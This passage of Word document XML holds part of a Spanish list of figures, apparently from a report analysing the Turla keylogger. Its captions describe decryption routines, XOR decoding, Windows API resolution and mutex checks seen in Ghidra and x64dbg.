          <w:t>Ilustración 63. Muestra del punto de entrada de la DLL en Ghidra.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358202 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>6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3" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 64. Muestra donde se observa una de las medidas de protección usadas.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358203 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>6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4" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 65. Función que realiza repetidas llamadas a la dirección 0x180001750</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358204 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>6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5" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 66. Código en C resultante del desensamblado con múltiples llamadas de descifrado.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358205 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>6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6" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 67. Función en C del primer descifrado de Turla Keylogger</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358206 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>6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7" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 68. Parte de la tabla de traslación con valores utilizados en el XOR.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358207 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>7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8" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 69. Parte de la zona de memoria donde se decodifican los datos con XOR.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358208 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>7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09" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 70. Visualización en modo gráfico de la subrutina de descifrado.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358209 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>7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0" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 71. Sección de la función principal del binario.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358210 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>7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1" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 72. Sección de la segunda función de descifrado.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358211 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>7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2" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 73. Primer bloque del segundo descifrado y llamadas equivalentes en C.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358212 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>7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3" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 74. Segunda función de descifrado de Turla Keylogger.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358213 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>7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4" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 75. Gráfico de llamadas con funciones analizadas renombradas.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358214 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>7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5" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 76. Fragmento de código donde se muestra el punto de entrada del binario a analizar.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358215 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>7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6" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 77. Parte del mapa de memoria del binario cargado en x64dbg.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358216 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>7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7" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 78. Función que realiza múltiples llamadas para descifrar datos de memoria.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358217 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>7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8" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 79. Muestra de zona de memoria donde se dejan los datos una vez descifrados.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358218 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>7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19" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 80. Parte del segundo descifrado donde establece valores en memoria.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358219 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>7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0" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 81. Parte de la función de segundo descifrado donde se observa el XOR con 0x55</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358220 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>7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1" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 82. Datos descifrados con los nombres de las funciones de la API de Windows.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358221 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>7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2" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 83. Sección que recorre lista de funciones de la API para obtener direcciones en memoria.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358222 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>7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3" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 84. Sección de la función GetProcAddressForCaller</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358223 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>7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4" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 85. Tabla con puntos de entrada en memoria a algunas funciones de la API de Windows que evidencian que hay una función de keylogger.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358224 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>7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5" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 86. Sección de código donde crea cadena para el Mutex.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358225 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>7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6" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 87. Comprobación de la creación del Mutex.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358226 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>7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7" w:history="1">
        <w:r w:rsidR="00DF019A" w:rsidRPr="00EF6C98">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:lang w:bidi="hi-IN"/>
          </w:rPr>
          <w:t>Ilustración 88. Muestra de Mutex creado dependiente de DLLLoader.</w:t>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19358227 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF019A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
